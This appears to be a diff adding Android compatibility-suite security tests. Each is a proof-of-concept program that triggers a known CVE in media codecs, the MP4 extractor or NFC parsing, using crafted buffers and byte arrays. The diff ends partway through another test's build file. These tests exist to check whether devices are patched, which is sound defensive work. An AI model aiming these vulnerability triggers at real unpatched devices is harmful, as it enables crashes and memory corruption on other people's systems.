a/hostsidetests/securitybulletin/securityPatch/CVE-2017-0684/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0684/Android.bp new file mode 100644 index 00000000000..ad70e63e8b8 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0684/Android.bp @@ -0,0 +1,44 @@ +/* + * Copyright (C) 2020 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ +cc_test { + name: "CVE-2017-0684", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.cpp", + ":cts_hostsidetests_securitybulletin_omxutils", + ], + shared_libs: [ + "libstagefright", + "libbinder", + "libmedia_omx", + "libutils", + "liblog", + "libui", + "libstagefright_foundation", + "libcutils", + "libhidlbase", + "libhidlmemory", + "android.hidl.allocator@1.0", + "android.hardware.media.omx@1.0", + ], + include_dirs: [ + "frameworks/native/include/media/openmax", + "frameworks/av/media/libstagefright", + "frameworks/native/include/media/hardware", + ], + compile_multilib: "32", +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2017-0684/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0684/poc.cpp new file mode 100644 index 00000000000..9b76c7b3b2a --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0684/poc.cpp @@ -0,0 +1,139 @@ +/** + * Copyright (C) 2020 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <stdlib.h> +#include "../includes/common.h" +#include "../includes/omxUtils.h" + +sp<IAllocator> mAllocator = IAllocator::getService("ashmem"); + +int allocateHidlPortBuffers(OMX_U32 portIndex, + Vector<Buffer> *buffers) { + buffers->clear(); + OMX_PARAM_PORTDEFINITIONTYPE def; + int err = omxUtilsGetParameter(portIndex, &def); + omxExitOnError(err); + for (OMX_U32 i = 0; i < def.nBufferCountActual; ++i) { + Buffer buffer; + buffer.mFlags = 0; + bool success; + auto transStatus = mAllocator->allocate(def.nBufferSize, + [&success, &buffer]( + bool s, + hidl_memory const& m) { + success = s; + buffer.mHidlMemory = m; + }); + omxExitOnError(!transStatus.isOk()); + omxExitOnError(!success); + omxUtilsUseBuffer(portIndex, buffer.mHidlMemory, &buffer.mID); + buffers->push(buffer); + } + return OK; +} + +int main() { + + /* Initialize OMX for the specified codec */ + status_t ret = omxUtilsInit((char *) "OMX.google.h264.encoder"); + omxExitOnError(ret); + /* Get OMX input port parameters */ + OMX_PARAM_PORTDEFINITIONTYPE *params = + (OMX_PARAM_PORTDEFINITIONTYPE *) malloc( + sizeof(OMX_PARAM_PORTDEFINITIONTYPE)); + memset(params, 0, sizeof(OMX_PARAM_PORTDEFINITIONTYPE)); + omxUtilsGetParameter(OMX_UTILS_IP_PORT, params); + int ipBufferCount = params->nBufferCountActual; + /* Set port mode */ + omxUtilsSetPortMode(OMX_UTILS_IP_PORT, IOMX::kPortModeDynamicANWBuffer); + /* Allocate input buffers and graphic buffer */ + sp<GraphicBuffer> graphicbuffer = new GraphicBuffer( + params->format.video.nFrameWidth, params->format.video.nFrameHeight, + HAL_PIXEL_FORMAT_RGBX_8888, + android::GraphicBuffer::USAGE_HW_VIDEO_ENCODER, "me"); + int i; + Vector<Buffer> inputBuffers; + Vector<Buffer> outputBuffers; + /* Register input buffers with OMX component */ + allocateHidlPortBuffers(OMX_UTILS_IP_PORT, &inputBuffers); + /* Get OMX output port parameters */ + memset(params, 0, sizeof(OMX_PARAM_PORTDEFINITIONTYPE)); + omxUtilsGetParameter(OMX_UTILS_OP_PORT, params); + int opBufferSize = params->nBufferSize; + int opBufferCount = params->nBufferCountActual; + allocateHidlPortBuffers(OMX_UTILS_OP_PORT, &outputBuffers); + /* Do OMX State chage to Idle */ + omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateIdle); + /* Do OMX State chage to Executing */ + omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateExecuting); + /* Empty input buffers and fill output buffers */ + OMXBuffer omxIpBuf(graphicbuffer); + omxUtilsEmptyBuffer(inputBuffers[0].mID, omxIpBuf, 0, 0, -1); + OMXBuffer omxOpBuf(0, opBufferSize); + omxUtilsFillBuffer(outputBuffers[0].mID, omxOpBuf, -1); + /* Do OMX State chage to Idle */ + omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateIdle); + /* Do OMX State chage to Loaded */ + omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateLoaded); + /* Free input and output buffers */ + for (i = 0; i < ipBufferCount; i++) { + omxUtilsFreeBuffer(OMX_UTILS_IP_PORT, inputBuffers[i].mID); + } + for (i = 0; i < opBufferCount; i++) { + omxUtilsFreeBuffer(OMX_UTILS_OP_PORT, outputBuffers[i].mID); + } + /*********************************************************************/ + /* Following code exposes vulnerability */ + /*********************************************************************/ + Vector<Buffer> newInputBuffers; + Vector<Buffer> newOutputBuffers; + /* Get OMX input port parameters, change settings and set output port*/ + /* port parameters */ + memset(params, 0, sizeof(OMX_PARAM_PORTDEFINITIONTYPE)); + omxUtilsGetParameter(OMX_UTILS_IP_PORT, params); + params->nBufferSize = 38016; + params->format.video.nFrameWidth = 2000; + params->format.video.nFrameHeight = 2000; + omxUtilsSetParameter(OMX_UTILS_IP_PORT, params); + /* Allocated input buffers and register with OMX component */ + allocateHidlPortBuffers(OMX_UTILS_IP_PORT, &newInputBuffers); + /* Allocated output buffers and register with OMX component */ + allocateHidlPortBuffers(OMX_UTILS_OP_PORT, &newOutputBuffers); + /* Do OMX State chage to Idle */ + omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateIdle); + /* Do OMX State chage to Executing */ + omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateExecuting); + /* Empty input buffers and fill output buffers */ + OMXBuffer newOmxIpBuf(graphicbuffer); + omxUtilsEmptyBuffer(newInputBuffers[0].mID, newOmxIpBuf, 0, 0, -1); + OMXBuffer newOmxOpBuf(0, opBufferSize); + omxUtilsFillBuffer(newOutputBuffers[0].mID, newOmxOpBuf, -1); + /* Do OMX State change to Idle */ + omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateIdle); + /* Do OMX State change to Loaded */ + omxUtilsSendCommand(OMX_CommandStateSet, OMX_StateLoaded); + /* Free input and output buffers */ + for (i = 0; i < ipBufferCount; i++) { + omxUtilsFreeBuffer(OMX_UTILS_IP_PORT, newInputBuffers[i].mID); + } + for (i = 0; i < opBufferCount; i++) { + omxUtilsFreeBuffer(OMX_UTILS_OP_PORT, newOutputBuffers[i].mID); + } + /* Free OMX resources */ + omxUtilsFreeNode(); + + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2017-0726/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0726/Android.bp new file mode 100644 index 00000000000..32959f2090b --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0726/Android.bp @@ -0,0 +1,39 @@ +/* + * Copyright (C) 2020 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ + +cc_test { + name: "CVE-2017-0726", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.cpp", + ":cts_hostsidetests_securitybulletin_memutils_track", + ], + include_dirs: [ + "frameworks/av/media/libmedia/include", + ], + shared_libs: [ + "libdatasource", + "libstagefright", + "libstagefright_foundation", + "libutils", + "liblog", + ], + cflags: [ + "-DCHECK_MEMORY_LEAK", + "-DENABLE_SELECTIVE_OVERLOADING", + ] +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2017-0726/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0726/poc.cpp new file mode 100644 index 00000000000..ea6935f7523 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2017-0726/poc.cpp @@ -0,0 +1,143 @@ +/** + * Copyright (C) 2020 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include "../includes/common.h" +#include "stdlib.h" + +#include "../includes/memutils_track.h" +#include <android/IMediaExtractor.h> +#include <datasource/DataSourceFactory.h> +#include <dlfcn.h> +#include <media/DataSource.h> +#include <media/IMediaHTTPService.h> +#include <media/stagefright/DataSourceBase.h> +#include <media/stagefright/MediaExtractor.h> +#include <media/stagefright/MetaData.h> + +unsigned char mp4_data[] = { + 0x00, 0x00, 0x00, 0x1C, 0x66, 0x74, 0x79, 0x70, 0x6D, 0x70, 0x34, 0x32, + 0x00, 0x00, 0x00, 0x00, 0x6D, 0x70, 0x34, 0x32, 0x64, 0x62, 0x79, 0x31, + 0x69, 0x73, 0x6F, 0x6D, 0x00, 0x00, 0x00, 0x74, 0x6D, 0x6F, 0x6F, 0x76, + 0x00, 0x00, 0x00, 0x6C, 0x75, 0x64, 0x74, 0x61, 0x00, 0x00, 0x00, 0x64, + 0x6D, 0x65, 0x74, 0x61, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x58, + 0x69, 0x6C, 0x73, 0x74, 0x00, 0x00, 0x00, 0x50, 0x2D, 0x2D, 0x2D, 0x2D, + 0x00, 0x00, 0x00, 0x1C, 0x6D, 0x65, 0x61, 0x6E, 0x00, 0x00, 0x00, 0x00, + 0x63, 0x6F, 0x6D, 0x2E, 0x61, 0x70, 0x70, 0x6C, 0x65, 0x2E, 0x69, 0x54, + 0x75, 0x6E, 0x65, 0x73, 0x00, 0x00, 0x00, 0x14, 0x6E, 0x61, 0x6D, 0x65, + 0x00, 0x00, 0x00, 0x00, 0x69, 0x54, 0x75, 0x6E, 0x53, 0x4D, 0x50, 0x42, + 0x00, 0x08, 0x00, 0x18, 0x64, 0x61, 0x74, 0x61, 0x33, 0x32, 0x20, 0x34, + 0x20, 0x33, 0x20, 0x32, 0x33, 0x32, 0x20, 0x34, 0x20, 0x33, 0x20, 0x32}; + +#if _32_BIT +#define LIBNAME "/system/lib/extractors/libmp4extractor.so" +#define LIBNAME_APEX "/apex/com.android.media/lib/extractors/libmp4extractor.so" +#elif _64_BIT +#define LIBNAME "/system/lib64/extractors/libmp4extractor.so" +#define LIBNAME_APEX \ + "/apex/com.android.media/lib64/extractors/libmp4extractor.so" +#endif + +#define TOTAL_SIZE 524432 +#define DATA_SIZE 144 +#define TRACK_SIZE (TOTAL_SIZE - DATA_SIZE + 16 + 1) +#define TMP_FILE "/data/local/tmp/temp_cve_2017_0726" + +char enable_selective_overload = ENABLE_NONE; +using namespace android; + +bool is_tracking_required(size_t size) { return (size == TRACK_SIZE); } + +int main() { + GetExtractorDef getDef = nullptr; + FILE *fp = fopen(TMP_FILE, "wb"); + if (!fp) { + return EXIT_FAILURE; + } + + char zero_array[TOTAL_SIZE - DATA_SIZE]; + memset(zero_array, 0, (TOTAL_SIZE - DATA_SIZE) * sizeof(char)); + + /* Write mp4 stream */ + fwrite(mp4_data, 1, DATA_SIZE, fp); + + /* Append 0's to create custom PoC */ + fwrite(zero_array, 1, (TOTAL_SIZE - DATA_SIZE), fp); + fclose(fp); + + void *libHandle = dlopen(LIBNAME, RTLD_NOW | RTLD_LOCAL); + if (!libHandle) { + libHandle = dlopen(LIBNAME_APEX, RTLD_NOW | RTLD_LOCAL); + if (!libHandle) { + remove(TMP_FILE); + return EXIT_FAILURE; + } + } + + getDef = (GetExtractorDef)dlsym(libHandle, "GETEXTRACTORDEF"); + if (!getDef) { + dlclose(libHandle); + remove(TMP_FILE); + return EXIT_FAILURE; + } + + sp<DataSource> dataSource = + DataSourceFactory::getInstance()->CreateFromURI(NULL, TMP_FILE); + if (dataSource == nullptr) { + dlclose(libHandle); + remove(TMP_FILE); + return EXIT_FAILURE; + } + + void *meta = nullptr; + void *creator = nullptr; + FreeMetaFunc freeMeta = nullptr; + float confidence; + if (getDef().def_version == EXTRACTORDEF_VERSION_NDK_V1) { + creator = (void *)getDef().u.v2.sniff(dataSource->wrap(), &confidence, + &meta, &freeMeta); + } else if (getDef().def_version == EXTRACTORDEF_VERSION_NDK_V2) { + creator = (void *)getDef().u.v3.sniff(dataSource->wrap(), &confidence, + &meta, &freeMeta); + } + if (!creator) { + dlclose(libHandle); + remove(TMP_FILE); + return EXIT_FAILURE; + } + + CMediaExtractor *ret = ((CreatorFunc)creator)(dataSource->wrap(), meta); + if (ret == nullptr) { + dlclose(libHandle); + remove(TMP_FILE); + return EXIT_FAILURE; + } + + if (meta != nullptr && freeMeta != nullptr) { + freeMeta(meta); + } + + sp<MetaData> metaData = new MetaData(); + MediaExtractorCUnwrapper *mediaExtractorCUnwrapper = + new MediaExtractorCUnwrapper(ret); + enable_selective_overload = ENABLE_MALLOC_CHECK; + mediaExtractorCUnwrapper->getTrackMetaData(*metaData.get(), 0, 1); + enable_selective_overload = ENABLE_NONE; + + remove(TMP_FILE); + dlclose(libHandle); + + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2017-13180/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2017-13180/Android.bp index 213958373f2..a3928d7a57a 100644 --- a/hostsidetests/securitybulletin/securityPatch/CVE-2017-13180/Android.bp +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2017-13180/Android.bp @@ -39,10 +39,6 @@ cc_test { "android.hidl.allocator@1.0", "android.hardware.media.omx@1.0", ], - suffix: "32", - }, - lib64: { - suffix: "64", }, }, } diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2017-13194/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2017-13194/Android.bp new file mode 100644 index 00000000000..9b478eb8340 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2017-13194/Android.bp @@ -0,0 +1,36 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ +cc_test { + name: "CVE-2017-13194", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.cpp", + ":cts_hostsidetests_securitybulletin_memutils", + ], + compile_multilib: "64", + shared_libs: [ + "liblog", + ], + include_dirs: [ + "external/libvpx/libvpx", + "external/libvpx/libvpx/vpx_ports", + ], + cflags: [ + "-DCHECK_OVERFLOW", + "-DENABLE_SELECTIVE_OVERLOADING", + ], +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2017-13194/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2017-13194/poc.cpp new file mode 100644 index 00000000000..f11cac935ed --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2017-13194/poc.cpp @@ -0,0 +1,127 @@ +/** + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <dlfcn.h> +#include <stdlib.h> +#include <string.h> +#include <sys/time.h> +#include <sys/types.h> +#include <sys/wait.h> +#include "../includes/memutils.h" +#include "vpx/vp8cx.h" +#include "vpx/vpx_codec.h" +#include "vpx/vpx_encoder.h" + +#define ENCODE_WIDTH 11 +#define ENCODE_HEIGHT 10000 +#define LIBNAME "/system/apex/com.android.media.swcodec/lib64/libvpx.so" +#define LIBNAME_APEX "/apex/com.android.media.swcodec/lib64/libvpx.so" + +char enable_selective_overload = ENABLE_NONE; + +int main() { + enable_selective_overload = ENABLE_ALL; + void *libHandle = dlopen(LIBNAME, RTLD_NOW | RTLD_LOCAL); + if (!libHandle) { + libHandle = dlopen(LIBNAME_APEX, RTLD_NOW | RTLD_LOCAL); + if (!libHandle) { + return EXIT_FAILURE; + } + } + vpx_codec_err_t codec_return = VPX_CODEC_OK; + vpx_codec_enc_cfg_t mCodecConfiguration; + vpx_image_t raw_frame; + uint32_t framerate = (30 << 16); + vpx_codec_iface_t *(*func_ptr1)() = + (vpx_codec_iface_t * (*)()) dlsym(libHandle, "vpx_codec_vp8_cx"); + if (!func_ptr1) { + dlclose(libHandle); + return EXIT_FAILURE; + } + vpx_codec_iface_t *mCodecInterface = (*func_ptr1)(); + if (!mCodecInterface) { + dlclose(libHandle); + return EXIT_FAILURE; + } + vpx_codec_err_t (*func_ptr2)(vpx_codec_iface_t *, vpx_codec_enc_cfg_t *, unsigned int) = + (vpx_codec_err_t(*)(vpx_codec_iface_t *, vpx_codec_enc_cfg_t *, unsigned int))dlsym( + libHandle, "vpx_codec_enc_config_default"); + if (!func_ptr2) { + dlclose(libHandle); + return EXIT_FAILURE; + } + codec_return = (*func_ptr2)(mCodecInterface, &mCodecConfiguration, 0); + mCodecConfiguration.g_w = ENCODE_WIDTH; + mCodecConfiguration.g_h = ENCODE_HEIGHT; + vpx_codec_ctx_t mCodecContext; + vpx_codec_err_t (*func_ptr3)(vpx_codec_ctx_t *, vpx_codec_iface_t *, vpx_codec_enc_cfg_t *, + vpx_codec_flags_t, int) = + (vpx_codec_err_t(*)(vpx_codec_ctx_t *, vpx_codec_iface_t *, vpx_codec_enc_cfg_t *, + vpx_codec_flags_t, int))dlsym(libHandle, "vpx_codec_enc_init_ver"); + if (!func_ptr3) { + dlclose(libHandle); + return EXIT_FAILURE; + } + codec_return = (*func_ptr3)(&mCodecContext, mCodecInterface, &mCodecConfiguration, 0, + VPX_ENCODER_ABI_VERSION); + + if (codec_return != VPX_CODEC_OK) { + return EXIT_FAILURE; + } + unsigned char *source = (unsigned char *)memalign(16, (ENCODE_WIDTH * ENCODE_HEIGHT * 3 / 2)); + if (!source) { + return EXIT_FAILURE; + } + memset(source, 0, (ENCODE_WIDTH * ENCODE_HEIGHT * 3 / 2)); + vpx_image_t (*func_ptr4)(vpx_image_t *, vpx_img_fmt_t, unsigned int, unsigned int, unsigned int, + unsigned char *) = + (vpx_image(*)(vpx_image *, vpx_img_fmt, unsigned int, unsigned int, unsigned int, + unsigned char *))dlsym(libHandle, "vpx_img_wrap"); + if (!func_ptr4) { + dlclose(libHandle); + free(source); + return EXIT_FAILURE; + } + (*func_ptr4)(&raw_frame, VPX_IMG_FMT_I420, ENCODE_WIDTH, ENCODE_HEIGHT, 1, source); + vpx_codec_err_t (*func_ptr5)(vpx_codec_ctx_t *, const vpx_image_t *, vpx_codec_pts_t, + unsigned long, vpx_enc_frame_flags_t, unsigned long) = + (vpx_codec_err_t(*)(vpx_codec_ctx *, const vpx_image *, long, unsigned long, long, + unsigned long))dlsym(libHandle, "vpx_codec_encode"); + if (!func_ptr5) { + dlclose(libHandle); + free(source); + return EXIT_FAILURE; + } + codec_return = + (*func_ptr5)(&mCodecContext, &raw_frame, framerate, + (uint32_t)(((uint64_t)1000000 << 16) / framerate), 0, VPX_DL_REALTIME); + if (codec_return != VPX_CODEC_OK) { + free(source); + return EXIT_FAILURE; + } + vpx_codec_err_t (*func_ptr6)(vpx_codec_ctx_t *) = + (vpx_codec_err_t(*)(vpx_codec_ctx *))dlsym(libHandle, "vpx_codec_destroy"); + if (!func_ptr6) { + dlclose(libHandle); + free(source); + return EXIT_FAILURE; + } + (*func_ptr6)(&mCodecContext); + enable_selective_overload = ENABLE_NONE; + dlclose(libHandle); + free(source); + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9558/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9558/Android.bp new file mode 100644 index 00000000000..ac45cc9edfe --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9558/Android.bp @@ -0,0 +1,34 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ + +cc_test { + name: "CVE-2018-9558", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.cpp", + ], + compile_multilib: "64", + shared_libs: [ + "libnfc-nci", + ], + include_dirs: [ + "system/nfc/src/nfc/include", + "system/nfc/src/gki/common", + "system/nfc/src/gki/ulinux", + "system/nfc/src/include", + ], +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9558/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9558/poc.cpp new file mode 100644 index 00000000000..e20c0f222d0 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9558/poc.cpp @@ -0,0 +1,50 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include "../includes/common.h" +#include <stdlib.h> + +#include <nfc_api.h> +#include <rw_int.h> + +#define INITIAL_VALUE 0xBE +#define NUM_BYTES 1 + +extern tRW_CB rw_cb; +void rw_init(void); +void rw_t2t_handle_rsp(uint8_t *p_data); + +void poc_cback(tRW_EVENT event, tRW_DATA *p_rw_data) { + (void)event; + (void)p_rw_data; +} + +int main() { + tRW_T2T_CB *p_t2t = &rw_cb.tcb.t2t; + rw_init(); + rw_cb.p_cback = &poc_cback; + p_t2t->state = RW_T2T_STATE_DETECT_TLV; + p_t2t->tlv_detect = TAG_LOCK_CTRL_TLV; + p_t2t->substate = RW_T2T_SUBSTATE_WAIT_READ_TLV_VALUE; + p_t2t->found_tlv = TAG_LOCK_CTRL_TLV; + p_t2t->bytes_count = NUM_BYTES; + p_t2t->tlv_value[1] = UINT8_MAX; + uint8_t *base_ptr = (uint8_t *)(p_t2t->lockbyte + RW_T1T_MAX_LOCK_BYTES); + memset((void *)base_ptr, INITIAL_VALUE, sizeof(tRW_T1T_LOCK)); + uint8_t data[T2T_READ_DATA_LEN]; + rw_t2t_handle_rsp(data); + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9561/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9561/Android.bp new file mode 100644 index 00000000000..86b23dc67f5 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9561/Android.bp @@ -0,0 +1,37 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ + +cc_test { + name: "CVE-2018-9561", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.cpp", + ":cts_hostsidetests_securitybulletin_memutils", + ], + cflags: [ + "-DCHECK_OVERFLOW", + ], + compile_multilib: "64", + include_dirs: [ + "system/nfc/src/nfc/include/", + "system/nfc/src/include/", + "system/nfc/src/gki/ulinux/", + ], + shared_libs: [ + "libnfc-nci", + ], +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9561/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9561/poc.cpp new file mode 100644 index 00000000000..6c4ccf2bc1c --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9561/poc.cpp @@ -0,0 +1,41 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <stdlib.h> +#include <string.h> +#include "llcp_api.h" + +#define DEFAULT_VALUE 0x06 +#define SIZE 16 +#define LENGTH 1 + +extern tLLCP_STATUS llcp_util_parse_connect(uint8_t* p_bytes, uint16_t length, + tLLCP_CONNECTION_PARAMS* p_params); + +int main() { + const int32_t offset = SIZE - LENGTH; + uint8_t* p_bytes = (uint8_t *)malloc(SIZE); + if (!p_bytes) { + return EXIT_FAILURE; + } + memset(p_bytes, DEFAULT_VALUE, SIZE); + + tLLCP_CONNECTION_PARAMS params; + llcp_util_parse_connect(&p_bytes[offset], LENGTH, ¶ms); + + free(p_bytes); + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9563/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9563/Android.bp new file mode 100644 index 00000000000..f6254384846 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9563/Android.bp @@ -0,0 +1,37 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ + +cc_test { + name: "CVE-2018-9563", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.cpp", + ":cts_hostsidetests_securitybulletin_memutils", + ], + cflags: [ + "-DCHECK_OVERFLOW", + ], + compile_multilib: "64", + include_dirs: [ + "system/nfc/src/nfc/include/", + "system/nfc/src/include/", + "system/nfc/src/gki/ulinux/", + ], + shared_libs: [ + "libnfc-nci", + ], +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9563/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9563/poc.cpp new file mode 100644 index 00000000000..e0211145680 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9563/poc.cpp @@ -0,0 +1,41 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <stdlib.h> +#include <string.h> +#include <llcp_api.h> + +#define DEFAULT_VALUE 0x02 +#define SIZE 16 +#define LENGTH 1 + +extern tLLCP_STATUS llcp_util_parse_cc(uint8_t* p_bytes, uint16_t length, + uint16_t* p_miu, uint8_t* p_rw); + +int main() { + const int32_t offset = SIZE - LENGTH; + uint8_t* p_bytes = (uint8_t *)malloc(SIZE); + if (!p_bytes) { + return EXIT_FAILURE; + } + memset(p_bytes, DEFAULT_VALUE, SIZE); + + tLLCP_CONNECTION_PARAMS params; + llcp_util_parse_cc(&p_bytes[offset], LENGTH, &(params.miu), &(params.rw)); + + free(p_bytes); + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-9584/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9584/Android.bp new file mode 100644 index 00000000000..0813445fe70 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-9584/Android.bp @@ -0,0 +1,40 @@ +/* + * Copyright 